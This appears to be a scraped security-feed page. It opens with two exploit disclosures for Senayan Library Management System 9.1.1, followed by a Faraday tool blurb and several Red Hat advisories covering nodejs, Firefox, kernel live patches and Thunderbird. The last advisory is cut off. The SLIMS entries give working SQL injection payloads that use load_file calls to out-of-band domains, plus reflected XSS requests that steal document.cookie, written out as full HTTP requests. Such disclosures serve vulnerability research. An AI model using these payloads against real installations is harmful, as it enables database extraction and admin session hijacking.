Senayan Library Management System version 9.1.1 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 11.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.1/slims9_bulian-9.1.1.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1/SQLi## Description:The `class` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+'was submitted in the class parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take information from all database columns of thissystem by using this vulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(selectload_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''RLIKE (SELECT (CASE WHEN (7860=7860) THEN 0x62626262+(selectload_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''ELSE 0x28 END)) AND'xGIA'='xGIA&membershipType=a''&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+'---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1/SQLi)## Proof and Exploit:[href](https://streamable.com/3li3zp)## Time spent`00:30:00`## Writing an exploit`00:15:00`

Senayan Library Management System 9.1.1 SQL Injection

Senayan Library Management System version 9.1.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image## Author: nu11secur1ty## Date: 12.17.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1## Description:The value of the `class` request parameter is copied into the HTMLdocument as plain text between tags.The payload ytrrh<script>alert(1)</script>z3nj2 was submitted in theclass parameter. This input was echoed unmodified in the application'sresponse.The attacker can trick some authenticated user to visit his page andgive to him very sensitive information about the system.## STATUS: HIGH Vulnerability[+] Payloads:0.0```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty<script>alert(document.cookie)</script>&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```0.1```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1)## Proof and Exploit:[href](https://streamable.com/ibdulr)## Time spent`01:30:00`

Senayan Library Management System 9.1.1 Cross Site Scripting

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 4.3.1

Red Hat Security Advisory 2022-9073-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include bypass and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: nodejs:16 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:9073-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9073  
Issue date:        2022-12-15  
CVE Names:         CVE-2021-44531 CVE-2021-44532 CVE-2021-44533  
                   CVE-2021-44906 CVE-2022-3517 CVE-2022-21824  
                   CVE-2022-43548  
====================================================================  
1. Summary:

An update for the nodejs:16 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The following packages were updated to later upstream versions: nodejs  
(16.18.1), nodejs-nodemon (2.0.20).

Security Fix(es):

* nodejs: Improper handling of URI Subject Alternative Names  
(CVE-2021-44531)

* nodejs: Certificate Verification Bypass via String Injection  
(CVE-2021-44532)

* nodejs: Incorrect handling of certificate subject and issuer fields  
(CVE-2021-44533)

* minimist: prototype pollution (CVE-2021-44906)

* nodejs-minimatch: ReDoS via the braceExpand function (CVE-2022-3517)

* nodejs: DNS rebinding in inspect via invalid octal IP address  
(CVE-2022-43548)

* nodejs: Prototype pollution via console.table properties (CVE-2022-21824)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* nodejs:16/nodejs: Packaged version of undici does not fit with declared  
version. [rhel-8] (BZ#2151625)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2040839 - CVE-2021-44531 nodejs: Improper handling of URI Subject Alternative Names  
2040846 - CVE-2021-44532 nodejs: Certificate Verification Bypass via String Injection  
2040856 - CVE-2021-44533 nodejs: Incorrect handling of certificate subject and issuer fields  
2040862 - CVE-2022-21824 nodejs: Prototype pollution via console.table properties  
2066009 - CVE-2021-44906 minimist: prototype pollution  
2134609 - CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function  
2140911 - CVE-2022-43548 nodejs: DNS rebinding in inspect via invalid octal IP address  
2142806 - nodejs:16/nodejs: Rebase to the latest Nodejs 16 release [rhel-8] [rhel-8.7.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-16.18.1-3.module+el8.7.0+17465+1a1abd74.src.rpm  
nodejs-nodemon-2.0.20-2.module+el8.7.0+17412+bb0e4a6b.src.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.src.rpm

aarch64:  
nodejs-16.18.1-3.module+el8.7.0+17465+1a1abd74.aarch64.rpm  
nodejs-debuginfo-16.18.1-3.module+el8.7.0+17465+1a1abd74.aarch64.rpm  
nodejs-debugsource-16.18.1-3.module+el8.7.0+17465+1a1abd74.aarch64.rpm  
nodejs-devel-16.18.1-3.module+el8.7.0+17465+1a1abd74.aarch64.rpm  
nodejs-full-i18n-16.18.1-3.module+el8.7.0+17465+1a1abd74.aarch64.rpm  
npm-8.19.2-1.16.18.1.3.module+el8.7.0+17465+1a1abd74.aarch64.rpm

noarch:  
nodejs-docs-16.18.1-3.module+el8.7.0+17465+1a1abd74.noarch.rpm  
nodejs-nodemon-2.0.20-2.module+el8.7.0+17412+bb0e4a6b.noarch.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.noarch.rpm

ppc64le:  
nodejs-16.18.1-3.module+el8.7.0+17465+1a1abd74.ppc64le.rpm  
nodejs-debuginfo-16.18.1-3.module+el8.7.0+17465+1a1abd74.ppc64le.rpm  
nodejs-debugsource-16.18.1-3.module+el8.7.0+17465+1a1abd74.ppc64le.rpm  
nodejs-devel-16.18.1-3.module+el8.7.0+17465+1a1abd74.ppc64le.rpm  
nodejs-full-i18n-16.18.1-3.module+el8.7.0+17465+1a1abd74.ppc64le.rpm  
npm-8.19.2-1.16.18.1.3.module+el8.7.0+17465+1a1abd74.ppc64le.rpm

s390x:  
nodejs-16.18.1-3.module+el8.7.0+17465+1a1abd74.s390x.rpm  
nodejs-debuginfo-16.18.1-3.module+el8.7.0+17465+1a1abd74.s390x.rpm  
nodejs-debugsource-16.18.1-3.module+el8.7.0+17465+1a1abd74.s390x.rpm  
nodejs-devel-16.18.1-3.module+el8.7.0+17465+1a1abd74.s390x.rpm  
nodejs-full-i18n-16.18.1-3.module+el8.7.0+17465+1a1abd74.s390x.rpm  
npm-8.19.2-1.16.18.1.3.module+el8.7.0+17465+1a1abd74.s390x.rpm

x86_64:  
nodejs-16.18.1-3.module+el8.7.0+17465+1a1abd74.x86_64.rpm  
nodejs-debuginfo-16.18.1-3.module+el8.7.0+17465+1a1abd74.x86_64.rpm  
nodejs-debugsource-16.18.1-3.module+el8.7.0+17465+1a1abd74.x86_64.rpm  
nodejs-devel-16.18.1-3.module+el8.7.0+17465+1a1abd74.x86_64.rpm  
nodejs-full-i18n-16.18.1-3.module+el8.7.0+17465+1a1abd74.x86_64.rpm  
npm-8.19.2-1.16.18.1.3.module+el8.7.0+17465+1a1abd74.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-44531  
https://access.redhat.com/security/cve/CVE-2021-44532  
https://access.redhat.com/security/cve/CVE-2021-44533  
https://access.redhat.com/security/cve/CVE-2021-44906  
https://access.redhat.com/security/cve/CVE-2022-3517  
https://access.redhat.com/security/cve/CVE-2022-21824  
https://access.redhat.com/security/cve/CVE-2022-43548  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhBdzjgjWX9erEAQhbZw//eRrw7Ef247fnaUY49eqgPyugkIkRUb6t  
rRh40ufGuAgZyhgnccN/C107dF5flibRgXil+pBGlUZSP2ZqTT/EaSrayWF4HYbr  
Zv28k3bDl1j6SswO2/wMt8AsiT0WXmwlPqsIMETIuiO6V4LK7L7sIQZdFd2RSgUo  
gzvGwkYQ1EXTXjp22n3mXn5/YMRszpcGZRT/XjU89s0OVgtZRr/MvFky+73pPXIT  
GhsNJxaPorlRAfNb5A2mI4g58Pg5Oml/Gs+FBMRZSiseJ3MZPK63PDlkSCoi9VH4  
PYKO//mymwdLnKs31IP54UgH9mxwCXAicTuKkCwtsPx58RBaamRvBZc85VglSnUh  
3Ion7Akq55rrGzvcThpJplcxzIYKB3D+ncrhCMXkkYbF0TmRMRBynTJ2hA0U7f/X  
Ef3MukJrYBgGwheEL5h76q5SOtZtNKxQdYk8a6uZu1GXy0AwyCyEfJe5bTTWnhDs  
2torYPJ9kVvIc+q857EjopwR2DfzrXZP/FdHXBE+gJb19Lef2YDQ4ygOHb+ags5/  
0FCXtruBg0MDH9NG5Io38ObZwwp3DW7mTeFDkXSJ5ns+eAoTLKSwAx8VJU/Afddb  
wjVeaGn6CME9Z6ZtrjG8FV+k+jGqWbQ0ccvh4G+4CroL5dU9MYYLGJZpWG4yDB8t  
qPWYIbnTsDI=cObr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9073-01

Red Hat Security Advisory 2022-9068-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9068-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9068  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
firefox-102.6.0-1.el8_6.src.rpm

aarch64:  
firefox-102.6.0-1.el8_6.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_6.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_6.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_6.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_6.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_6.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_6.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_6.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_6.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_6.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_6.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhDNzjgjWX9erEAQhCGhAAh9wrK1g4NxDEWTLQCDfBdEB13B24d9wk  
qBp3q/1HGrAGs6XxN+GhUmfXlimGGtpca4Fcp6+qkRAQSQwGpGkd8fpJbK7Zxgqi  
68pfB7069vlUI7+ed4OAZSaMi10uhPXlvHL94W2cxaRPjlfOY1xibOXXEuwH7ht1  
mrXbml9zDiU6JjzrqEaCtJ4P7VpMRB9JVD23WNN4HHGkB/dQ14lKhreQuhZtDlLe  
csEMm+XCtlTT/xsUxWtEK8mtsW6NQI33OXsSn1WngOIekeqrZ4nB1xq6xiYeEmh0  
JnEKacDLZYyeGviXnAVQ3cw3zkvnO2O56MCFNU1mrsf0hy4m4mW9pvEGrYhT3Xyy  
NWVDpqeoLTCzMggwIZ6XfwnRDSEjSCnqZd2d0dEUTmiSweiWrHUxYHt+tGdKt8Sh  
wKlD39NQL0zDBoTbS4w0RxBMN86bbgb+T+qXrdDnzDyRWv8vLXt2XsShWYrlEEzQ  
v7+2KuXWfqz1XRgxu8BWCwtS/FwLZwARBB2RpZ/yOCJUjYw/t6ynued1mGSI1cY1  
Zxb61b2TtI7hYyjJAX5Fqukp/NAXFH6lo760kBK8hUhq4OKe2/Au6sCurGCRHT6W  
fjKUhG+Tz+z+JaSEOsG/JwbATo+AWwYGxYYblxNva7hkZpGMrSdpI/4C6zYxxDda  
RIPXx9yvmhQ=hid3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9068-01

Red Hat Security Advisory 2022-9082-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include buffer overflow, out of bounds write, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2022:9082-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9082  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-1158 CVE-2022-2639 CVE-2022-2959  
                   CVE-2022-43945  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.9.0) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

* kernel: watch queue race condition can lead to privilege escalation  
(CVE-2022-2959)

* kernel: nfsd buffer overflow by RPC message over TCP with garbage data  
(CVE-2022-43945)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()  
2103681 - CVE-2022-2959 kernel: watch queue race condition can lead to privilege escalation  
2141752 - CVE-2022-43945 kernel: nfsd buffer overflow by RPC message over TCP with garbage data

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kpatch-patch-5_14_0-70_13_1-1-5.el9_0.src.rpm  
kpatch-patch-5_14_0-70_17_1-1-4.el9_0.src.rpm  
kpatch-patch-5_14_0-70_22_1-1-4.el9_0.src.rpm  
kpatch-patch-5_14_0-70_26_1-1-3.el9_0.src.rpm  
kpatch-patch-5_14_0-70_30_1-1-1.el9_0.src.rpm

ppc64le:  
kpatch-patch-5_14_0-70_13_1-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_13_1-debuginfo-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_13_1-debugsource-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_17_1-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_17_1-debuginfo-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_17_1-debugsource-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_22_1-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_22_1-debuginfo-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_22_1-debugsource-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_26_1-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_26_1-debuginfo-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_26_1-debugsource-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_30_1-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_30_1-debuginfo-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_30_1-debugsource-1-1.el9_0.ppc64le.rpm

x86_64:  
kpatch-patch-5_14_0-70_13_1-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_13_1-debuginfo-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_13_1-debugsource-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_17_1-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_17_1-debuginfo-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_17_1-debugsource-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_22_1-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_22_1-debuginfo-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_22_1-debugsource-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_26_1-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_26_1-debuginfo-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_26_1-debugsource-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_30_1-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_30_1-debuginfo-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_30_1-debugsource-1-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2959  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug7NzjgjWX9erEAQjqwA//QXemNcN+JiDPGuKUjrrbsdAd0LHyMg3z  
55HbU3XKWXuj4dxke5ZKfn38dvd84g7fepQpG52W2frPRjkQHhO4Uokta43EcCXc  
RZLKI9jNq3bMvsFPmTZlSFElamz6OTn2ECSgYh8NyrNl3VzHr5hy/eJET3QM1kig  
tsIjjdcP/VNlm41Zs9kdHBqPdV/Nr/aVrjeFgBx/ig3JrP0ePfloWUezVIJD/QQV  
PkWUgGdXNUK2jvlB3AH7iwhRWMGxKbRceEvJZS9yc2S9Hy1M7lj5DZQgt9CU02xU  
aWMxNTcGlVBNsCPgFz2GOXMr5VQebtMkVIMMjOlB8vH0PrlunSy4NWlkZdh/cBc/  
FAHuS8L1Fsl2K8neacBbMpWLTaKteorC0ZbL9ZW5hMmVKLfiecm1Z2L2CYtAb0GG  
u3RwsycRCX0GVzWamlbKn6MLcKgxLtzl1XMd9kHEGRWSb05O9P0ECj0SV7zwDy4o  
3/GoLeAglIzP+sxdAeeK6ocA5zAdHTZM26KI2MYe0yyLR5n/EiO4Lxcs6YCdPP7n  
XGB+vCpV/xS77tzMDafyS/9Gq7cguwn3v5DQQHCQ4Db3n5z3uhAc0QVfSKzaYnkY  
5bTK99gofD8HbC8kHMExNEbVWu6x3yLhtXiOhrQKGLX1dU2UiQyGJmmfwvTzb0+G  
HVA5TRLZ0Ak=Heu4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9082-01

Red Hat Security Advisory 2022-9075-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9075-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9075  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
thunderbird-102.6.0-2.el8_4.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.aarch64.rpm

ppc64le:  
